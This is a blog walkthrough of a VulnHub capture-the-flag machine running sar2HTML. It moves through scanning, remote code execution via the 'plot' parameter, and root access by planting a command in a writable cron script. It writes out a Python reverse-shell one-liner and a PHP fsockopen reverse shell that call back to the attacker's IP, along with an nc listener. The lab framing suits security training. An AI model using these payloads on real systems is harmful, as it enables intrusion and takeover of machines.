In this article, we will solve a Capture the Flag (CTF) challenge which was posted on Vulnhub.
As you may know from previous articles, vulnhub.com is a platform which provides vulnerable applications/machines to gain practical hands-on experience in the field of information security. You can check my previous articles for more CTF challenges. I have also provided a downloadable URL for this CTF below; you can download the machine and run it on VirtualBox.
The torrent downloadable URL is also available for this VM; it’s been added in the reference section of this article.
As per the information given on Vulnhub, this is a recent CTF which was posted in February 2020 by the author Love. As mentioned by the author, the challenge comprises of collecting the flag by getting the root. Prerequisites for this challenge are having a bit of knowledge of Linux commands and the ability to run some basic penetration testing tools.
For those who are not aware of the site, VulnHub is a well-known website for security researchers that aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. You can download vulnerable machines from this website and try to exploit them. I highly suggest trying these challenges as it is a good way to sharpen your skills and also learn new techniques in a safe environment.
Please Note: For all of these machines, I have used Oracle Virtual Box to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.
The summary of the steps which we used to solve this CTF is given below.
- We start by getting the target machine IP address by using the Netdiscover utility
- Scan open ports by using the Nmap scanner
- Enumerate the web application with Dirb Utility
- Exploit Remote Code Execution vulnerability
- Get the remote shell by using the Python command
- Enumerate and read user flag
- Exploit week file permission and get the root access
Step 1: Finding the IP of the target machine
After downloading and running this machine on VirtualBox, the first step is to explore the VM by running Netdiscover command to get the IP address of the target machine. The Netdiscover command output can be seen in the screenshot below: [CLICK IMAGES TO ENLARGE]
Command Used << netdiscover >>
As we can see, we now have the Virtual Machine IP address: 192.168.1.24 (the target machine IP address). We will be using 192.168.1.20 as the attacker IP address.
For Your Information: The target and attacker machine IP addresses may be different as per your network configuration.
After getting the target machine IP address, the first step is to find out the open ports and services available on this machine. I ran an Nmap full-port scan on the target machine. The Nmap results can be seen in the following screenshot:
Command Used <<nmap 192.168.1.16 -A>>
We can see above that port 80 is open on the target machine on which the HTTP service is running. The above scan also provides some further information about the target system configuration that may be useful for us in the later stages.
Let’s start by exploring the open port and services on the target machine. After opening the IP address in the browser, we found that there was an application running on it which can be seen in the below screenshot:
As we can see, it is showing the default apache page. Let’s try to figure out of there are any other files on the server that we can explore. For this, I chose to run ‘dirb’ tool on the target machine which enumerates the list of files in an application. It is a default tool on Kali Linux. The results can be seen in the following screenshot:
Command Used << dirb http://192.168.1.24>>
As we can see, we have got a few noticeable results from the scan output. There are a few files that returned the 200 status code. Let us open the ‘robots.txt’ file on the browser. The output of the same can be seen in the following screenshot:
So, we can see that there is an uncommon entry in the robots.txt file. It is a text string “sar2HTML”. Out of curiosity, I decided to run this on the browser and found that it was a good decision. The output can be seen in the following screenshot:
As we can see in the above screenshot, the ‘sar2HTML’ file led us to know that it is actually a tool which is installed on the target machine and that the version number of the tool was also available.
From the previous step, we got to know that our target application is the sar2HTML application and the version of that application is also visible. So I quickly ran a Google search to try to find an available exploit for it. The results of the Google search can be seen in the following screenshot:
The very first result on Google was an Exploit-DB URL with the available exploit for the tool. When I clicked on the exploit URL, I found that the tool was having a remote code execution vulnerability. The following screenshot shows the details of the exploit available on exploit-db website:
In the highlighted area of the above screenshot, we can see that we just need to use a parameter called “plot” on the index page of the target machine IP. From there, we can successfully execute commands through the browser on the target machine.
I crafted the URL which would work on the target machine. The URL is given below:
I tried to read the ‘etc/passwd’ file through the command execution URL. The result of our exploit can be seen in the following screenshot:
Right now, we can execute commands on the target system by utilizing the exploit DB command execution steps. As the goal of this CTF is to gain root access of the target machine, in this step we will work towards taking the reverse shell of the target machine. There are multiple ways through which we can accomplish this. Some of them are listed below:
- We can use the python Perl command to take the reverse shell.
- We can use Metasploit to create a reverse connection file and upload it on the target machine by using the wget utility and take the reverse connection.
- If the target machine has the NetCut utility, we can also use it for taking the reverse connection. This is easiest way for reverse connection.
So, first I will be trying the 3rd method to see if it works. For this, we first have to verify that the target machine has the NetCut utility. We can try running the ‘nc –help’ command, if the command returns the output of the command manual, it means that the ‘NetCut’ utility is available.
In the above screenshot, we can see that we first ran the NetCut help command, but it doesn’t return any help details. That means the NetCut utility is not available here, so it cannot be used in taking the reverse shell. So, lets try the 1st method next and check to see if a Python or Perl package is available or not. First, I checked for a python package. The output can be seen in the below screenshot:
In the highlighted area of the above screenshot, we can see the output of the help command which confirms that python package is available on the target machine and it can be used now for taking the reverse connection. I prepared the reverse connection script and executed it on the target machine, which gave me the reverse connection. It can also be seen in the following screenshot:
- <<python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.20”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’>>
- <<nc -lvp 1234>>
In the above screenshot, we can see that first I used NC command on the attacker system to listen on port 1234. After that, we hit the python payload on the browser which gave us the reverse connection of the system.
In the previous step, we got the shell access, but it was the limited shell and our target is to take the root access of the target machine. So, I ran another python command which gives us the stable shell access. After that, we ran another command to enumerate the kernel version and operating system version of the target machine. This can be seen in the screenshot given below:
- <<python3 -c ‘import pty;pty.spawn(“/bin/bash”)’>>
- << id>>
- <<cat /etc/issue>>
- <<uname -a>>
Above, we can see the operating system and kernel version, so I searched for an exploit online, but none of them seem to be working. I started exploring the system for further information which can help us to take the root access.
During the enumeration of the target system as a limited user, we got the user flag, which can be seen in the following screenshot:
- <<cd /home/love/Desktop>>
- <<cat user.txt>>
In the highlighted area of the above screenshot, we can see that we were able to read the ‘user.txt’ flag. During the enumeration, we also got some interesting information which we will check in next step.
While checking for weak file permissions and processes, we found that there was a Cron job which was being run as a root user every 5 minutes. It can be seen in the screenshot below:
- <<cat /etc/crontab>>
The Cron job was running from a file, finally.sh as seen below:
Let’s understand the steps that were taken in the above screenshot. I have numbered each command, which are explained below:
- This command was used to change the current working directory to html as the Cron was running from this directory. << cd /var/www/html >>
- Then we used the ls command to check available files and directories. << ls >>
- The ‘Cat’ command was used to read the contents of the file which shows that it is calling another file which exist in the same folder the file name was ‘write.sh’. << cat finally.sh >>
- Once again, I used the cat command to read the content of ‘write.sh’ file, which shows that it is only creating the folder in the temp directory. << cat write.sh >>
- This command was used to list the files with permission, and we have found that we can edit the write.sh file, as it has full permissions on the server. It is being called by the Cron and the Cron was running as root user. << ls -l >>
Now, I just added the php reverse connection command into the ‘write.sh’ file. It can be seen in the following screenshot:
php -r ‘$sock=fsockopen(“192.168.1.20”,4444);exec(“/bin/sh -i<&3 >&3 2>&3”);’
This command will give us the reverse connection on port no. 4444 on our attacker machine as we have mentioned the attacker machine IP address. As we already know, Cron is set to run every five minutes. After waiting for 5 minutes, we finally got the reverse connection of the root user, which can be seen in the screenshot given below:
Now that we have the root access of the target machine, which was the target of this CTF, let us complete the CTF by reading the flag file, which can be seen in the following screenshot:
Command Used << cat /root/root.txt >>
As we can see above, we were able to read both the flag files and to also get the root access of the target machine.
This completes the CTF challenge. Hope you enjoyed it! Try it yourself and let me know in comments if you have any doubts or concerns.